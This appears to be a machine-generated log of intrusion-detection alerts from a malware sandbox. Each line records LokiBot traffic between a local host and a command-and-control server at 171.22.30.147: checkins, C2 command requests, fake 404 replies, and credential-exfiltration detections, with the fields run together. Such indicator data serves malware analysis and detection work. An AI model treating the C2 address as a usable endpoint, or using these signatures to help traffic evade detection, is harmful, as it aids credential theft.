              192.168.2.3171.22.30.14750049802021641 01/05/23-08:53:54.543372TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749807802021641 01/05/23-08:52:43.044779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499192025483 01/05/23-08:53:16.269988TCP2025483ET TROJAN LokiBot Fake 404 Response8049919171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749836802025381 01/05/23-08:52:51.681664TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498982025483 01/05/23-08:53:09.925316TCP2025483ET TROJAN LokiBot Fake 404 Response8049898171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749788802024318 01/05/23-08:52:37.784136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749788802024313 01/05/23-08:52:37.784136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749995802825766 01/05/23-08:53:38.676723TCP2825766ETPRO TROJAN LokiBot Checkin M24999580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498872025483 01/05/23-08:53:06.208980TCP2025483ET TROJAN LokiBot Fake 404 Response8049887171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498762025483 01/05/23-08:53:03.261443TCP2025483ET TROJAN LokiBot Fake 404 Response8049876171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750040802024318 01/05/23-08:53:52.135869TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749824802825766 01/05/23-08:52:47.639113TCP2825766ETPRO TROJAN LokiBot Checkin M24982480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749955802025381 01/05/23-08:53:25.989714TCP2025381ET TROJAN LokiBot Checkin4995580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750040802024313 01/05/23-08:53:52.135869TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749890802825766 01/05/23-08:53:06.934564TCP2825766ETPRO TROJAN LokiBot Checkin M24989080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749991802025381 01/05/23-08:53:37.629731TCP2025381ET TROJAN LokiBot Checkin4999180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500362025483 01/05/23-08:53:51.130015TCP2025483ET TROJAN LokiBot Fake 404 Response8050036171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749787802021641 01/05/23-08:52:37.509502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750004802024313 01/05/23-08:53:41.033557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750004802024318 01/05/23-08:53:41.033557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749864802024318 01/05/23-08:52:59.960618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749814802825766 01/05/23-08:52:44.953030TCP2825766ETPRO TROJAN LokiBot Checkin M24981480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498322025483 01/05/23-08:52:49.888875TCP2025483ET TROJAN LokiBot Fake 404 Response8049832171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749725802825766 01/05/23-08:52:18.390674TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749856802025381 01/05/23-08:52:57.793570TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749959802024318 01/05/23-08:53:28.075379TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749702802021641 01/05/23-08:52:08.155254TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749864802024313 01/05/23-08:52:59.960618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749953802024313 01/05/23-08:53:25.469204TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749781802021641 01/05/23-08:52:35.821668TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749953802024318 01/05/23-08:53:25.469204TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749945802025381 01/05/23-08:53:23.275014TCP2025381ET TROJAN LokiBot Checkin4994580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750052802025381 01/05/23-08:53:55.369344TCP2025381ET TROJAN LokiBot Checkin5005280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749899802825766 01/05/23-08:53:10.169881TCP2825766ETPRO TROJAN LokiBot Checkin M24989980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500032025483 01/05/23-08:53:40.844768TCP2025483ET TROJAN LokiBot Fake 404 Response8050003171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750082802021641 01/05/23-08:54:03.532238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749831802024318 01/05/23-08:52:49.539016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749797802021641 01/05/23-08:52:40.255110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749909802825766 01/05/23-08:53:13.489642TCP2825766ETPRO TROJAN LokiBot Checkin M24990980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749831802024313 01/05/23-08:52:49.539016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750010802825766 01/05/23-08:53:42.643021TCP2825766ETPRO TROJAN LokiBot Checkin M25001080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749949802024318 01/05/23-08:53:24.361661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749886802021641 01/05/23-08:53:05.845633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750020802021641 01/05/23-08:53:45.631791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749840802025381 01/05/23-08:52:53.465268TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497722025483 01/05/23-08:52:31.725573TCP2025483ET TROJAN LokiBot Fake 404 Response8049772171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749846802025381 01/05/23-08:52:55.097334TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749949802024313 01/05/23-08:53:24.361661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749935802025381 01/05/23-08:53:20.565175TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749781802825766 01/05/23-08:52:35.821668TCP2825766ETPRO TROJAN LokiBot Checkin M24978180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749791802021641 01/05/23-08:52:38.617554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749998802825766 01/05/23-08:53:39.461942TCP2825766ETPRO TROJAN LokiBot Checkin M24999880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749751802025381 01/05/23-08:52:25.762510TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497832025483 01/05/23-08:52:36.476500TCP2025483ET TROJAN LokiBot Fake 404 Response8049783171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749870802825766 01/05/23-08:53:01.561418TCP2825766ETPRO TROJAN LokiBot Checkin M24987080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750060802024313 01/05/23-08:53:57.543966TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749725802021641 01/05/23-08:52:18.390674TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750020802825766 01/05/23-08:53:45.631791TCP2825766ETPRO TROJAN LokiBot Checkin M25002080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499622025483 01/05/23-08:53:29.944322TCP2025483ET TROJAN LokiBot Fake 404 Response8049962171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750026802825766 01/05/23-08:53:48.341265TCP2825766ETPRO TROJAN LokiBot Checkin M25002680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750049802825766 01/05/23-08:53:54.543372TCP2825766ETPRO TROJAN LokiBot Checkin M25004980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749715802825766 01/05/23-08:52:14.021138TCP2825766ETPRO TROJAN LokiBot Checkin M24971580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749757802025381 01/05/23-08:52:27.498112TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499732025483 01/05/23-08:53:32.908458TCP2025483ET TROJAN LokiBot Fake 404 Response8049973171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750036802021641 01/05/23-08:53:51.046851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750060802024318 01/05/23-08:53:57.543966TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749930802024318 01/05/23-08:53:19.220224TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749896802021641 01/05/23-08:53:08.759564TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750013802021641 01/05/23-08:53:43.455950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749930802024313 01/05/23-08:53:19.220224TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499952025483 01/05/23-08:53:38.758200TCP2025483ET TROJAN LokiBot Fake 404 Response8049995171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749985802021641 01/05/23-08:53:36.027311TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749741802025381 01/05/23-08:52:22.916909TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749791802825766 01/05/23-08:52:38.617554TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498042025483 01/05/23-08:52:42.259302TCP2025483ET TROJAN LokiBot Fake 404 Response8049804171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750050802024313 01/05/23-08:53:54.799294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749880802825766 01/05/23-08:53:04.232334TCP2825766ETPRO TROJAN LokiBot Checkin M24988080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750039802825766 01/05/23-08:53:51.865723TCP2825766ETPRO TROJAN LokiBot Checkin M25003980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749765802024318 01/05/23-08:52:29.748218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749768802024318 01/05/23-08:52:30.564042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750050802024318 01/05/23-08:53:54.799294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749765802024313 01/05/23-08:52:29.748218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497502025483 01/05/23-08:52:25.555747TCP2025483ET TROJAN LokiBot Fake 404 Response8049750171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749854802024313 01/05/23-08:52:57.240558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749768802024313 01/05/23-08:52:30.564042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749943802024318 01/05/23-08:53:22.718924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749854802024318 01/05/23-08:52:57.240558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749943802024313 01/05/23-08:53:22.718924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750026802021641 01/05/23-08:53:48.341265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749919802825766 01/05/23-08:53:16.188265TCP2825766ETPRO TROJAN LokiBot Checkin M24991980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749712802825766 01/05/23-08:52:12.436257TCP2825766ETPRO TROJAN LokiBot Checkin M24971280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749712802021641 01/05/23-08:52:12.436257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750079802024313 01/05/23-08:54:02.588823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749801802021641 01/05/23-08:52:41.371912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749801802825766 01/05/23-08:52:41.371912TCP2825766ETPRO TROJAN LokiBot Checkin M24980180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749932802025381 01/05/23-08:53:19.762349TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749972802021641 01/05/23-08:53:32.566966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749817802021641 01/05/23-08:52:45.747633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750063802024313 01/05/23-08:53:58.331391TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750065802025381 01/05/23-08:53:58.843527TCP2025381ET TROJAN LokiBot Checkin5006580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749906802021641 01/05/23-08:53:12.686115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750063802024318 01/05/23-08:53:58.331391TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749959802024313 01/05/23-08:53:28.075379TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500242025483 01/05/23-08:53:47.891283TCP2025483ET TROJAN LokiBot Fake 404 Response8050024171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750083802025381 01/05/23-08:54:03.789158TCP2025381ET TROJAN LokiBot Checkin5008380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749755802025381 01/05/23-08:52:26.961334TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749896802825766 01/05/23-08:53:08.759564TCP2825766ETPRO TROJAN LokiBot Checkin M24989680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750022802025381 01/05/23-08:53:46.665385TCP2025381ET TROJAN LokiBot Checkin5002280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749740802825766 01/05/23-08:52:22.636691TCP2825766ETPRO TROJAN LokiBot Checkin M24974080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749839802024313 01/05/23-08:52:53.202583TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499442025483 01/05/23-08:53:23.101688TCP2025483ET TROJAN LokiBot Fake 404 Response8049944171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749836802021641 01/05/23-08:52:51.681664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749839802024318 01/05/23-08:52:53.202583TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749984802025381 01/05/23-08:53:35.743967TCP2025381ET TROJAN LokiBot Checkin4998480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749835802825766 01/05/23-08:52:50.902278TCP2825766ETPRO TROJAN LokiBot Checkin M24983580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749831802021641 01/05/23-08:52:49.539016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750058802021641 01/05/23-08:53:57.002594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749940802024318 01/05/23-08:53:21.893765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749926802021641 01/05/23-08:53:18.143087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498862025483 01/05/23-08:53:05.936188TCP2025483ET TROJAN LokiBot Fake 404 Response8049886171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499032025483 01/05/23-08:53:11.958213TCP2025483ET TROJAN LokiBot Fake 404 Response8049903171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750072802024318 01/05/23-08:54:00.683642TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497902025483 01/05/23-08:52:38.427307TCP2025483ET TROJAN LokiBot Fake 404 Response8049790171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749808802021641 01/05/23-08:52:43.325468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749940802024313 01/05/23-08:53:21.893765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749744802024318 01/05/23-08:52:23.736699TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750072802024313 01/05/23-08:54:00.683642TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749744802024313 01/05/23-08:52:23.736699TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749800802025381 01/05/23-08:52:41.099242TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749862802024313 01/05/23-08:52:59.436708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749897802021641 01/05/23-08:53:09.055046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749957802024318 01/05/23-08:53:26.768134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749958802825766 01/05/23-08:53:27.233105TCP2825766ETPRO TROJAN LokiBot Checkin M24995880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749863802825766 01/05/23-08:52:59.703117TCP2825766ETPRO TROJAN LokiBot Checkin M24986380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749862802024318 01/05/23-08:52:59.436708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749941802825766 01/05/23-08:53:22.165125TCP2825766ETPRO TROJAN LokiBot Checkin M24994180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749945802024313 01/05/23-08:53:23.275014TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749812802025381 01/05/23-08:52:44.412618TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749985802024318 01/05/23-08:53:36.027311TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749968802025381 01/05/23-08:53:31.490288TCP2025381ET TROJAN LokiBot Checkin4996880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749757802825766 01/05/23-08:52:27.498112TCP2825766ETPRO TROJAN LokiBot Checkin M24975780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749985802024313 01/05/23-08:53:36.027311TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749801802024313 01/05/23-08:52:41.371912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749778802825766 01/05/23-08:52:34.958959TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497302025483 01/05/23-08:52:19.930196TCP2025483ET TROJAN LokiBot Fake 404 Response8049730171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749713802021641 01/05/23-08:52:12.826844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750041802021641 01/05/23-08:53:52.410718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497682025483 01/05/23-08:52:30.646820TCP2025483ET TROJAN LokiBot Fake 404 Response8049768171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749718802021641 01/05/23-08:52:15.464089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749699802024312 01/05/23-08:52:06.870270TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749917802024318 01/05/23-08:53:15.635846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497712025483 01/05/23-08:52:31.457724TCP2025483ET TROJAN LokiBot Fake 404 Response8049771171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749996802025381 01/05/23-08:53:38.933239TCP2025381ET TROJAN LokiBot Checkin4999680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750023802024318 01/05/23-08:53:47.546596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497382025483 01/05/23-08:52:22.148864TCP2025483ET TROJAN LokiBot Fake 404 Response8049738171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749699802024317 01/05/23-08:52:06.870270TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749917802024313 01/05/23-08:53:15.635846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497162025483 01/05/23-08:52:14.437339TCP2025483ET TROJAN LokiBot Fake 404 Response8049716171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749913802825766 01/05/23-08:53:14.593137TCP2825766ETPRO TROJAN LokiBot Checkin M24991380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750057802825766 01/05/23-08:53:56.743180TCP2825766ETPRO TROJAN LokiBot Checkin M25005780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749729802825766 01/05/23-08:52:19.554519TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749741802021641 01/05/23-08:52:22.916909TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749783802025381 01/05/23-08:52:36.372208TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749801802024318 01/05/23-08:52:41.371912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500652025483 01/05/23-08:53:58.921375TCP2025483ET TROJAN LokiBot Fake 404 Response8050065171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749838802025381 01/05/23-08:52:52.824149TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749954802021641 01/05/23-08:53:25.726692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750079802021641 01/05/23-08:54:02.588823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749861802025381 01/05/23-08:52:59.149010TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750006802025381 01/05/23-08:53:41.552586TCP2025381ET TROJAN LokiBot Checkin5000680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749876802021641 01/05/23-08:53:03.175112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499852025483 01/05/23-08:53:36.104350TCP2025483ET TROJAN LokiBot Fake 404 Response8049985171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500432025483 01/05/23-08:53:53.036023TCP2025483ET TROJAN LokiBot Fake 404 Response8050043171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749780802825766 01/05/23-08:52:35.511333TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749884802825766 01/05/23-08:53:05.293982TCP2825766ETPRO TROJAN LokiBot Checkin M24988480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749875802825766 01/05/23-08:53:02.907470TCP2825766ETPRO TROJAN LokiBot Checkin M24987580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499662025483 01/05/23-08:53:31.030517TCP2025483ET TROJAN LokiBot Fake 404 Response8049966171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749827802024313 01/05/23-08:52:48.461129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499252025483 01/05/23-08:53:17.956704TCP2025483ET TROJAN LokiBot Fake 404 Response8049925171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749847802825766 01/05/23-08:52:55.372015TCP2825766ETPRO TROJAN LokiBot Checkin M24984780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749752802825766 01/05/23-08:52:26.039085TCP2825766ETPRO TROJAN LokiBot Checkin M24975280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499222025483 01/05/23-08:53:17.153460TCP2025483ET TROJAN LokiBot Fake 404 Response8049922171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749715802025381 01/05/23-08:52:14.021138TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749706802025381 01/05/23-08:52:09.771973TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.3171.22.30.147
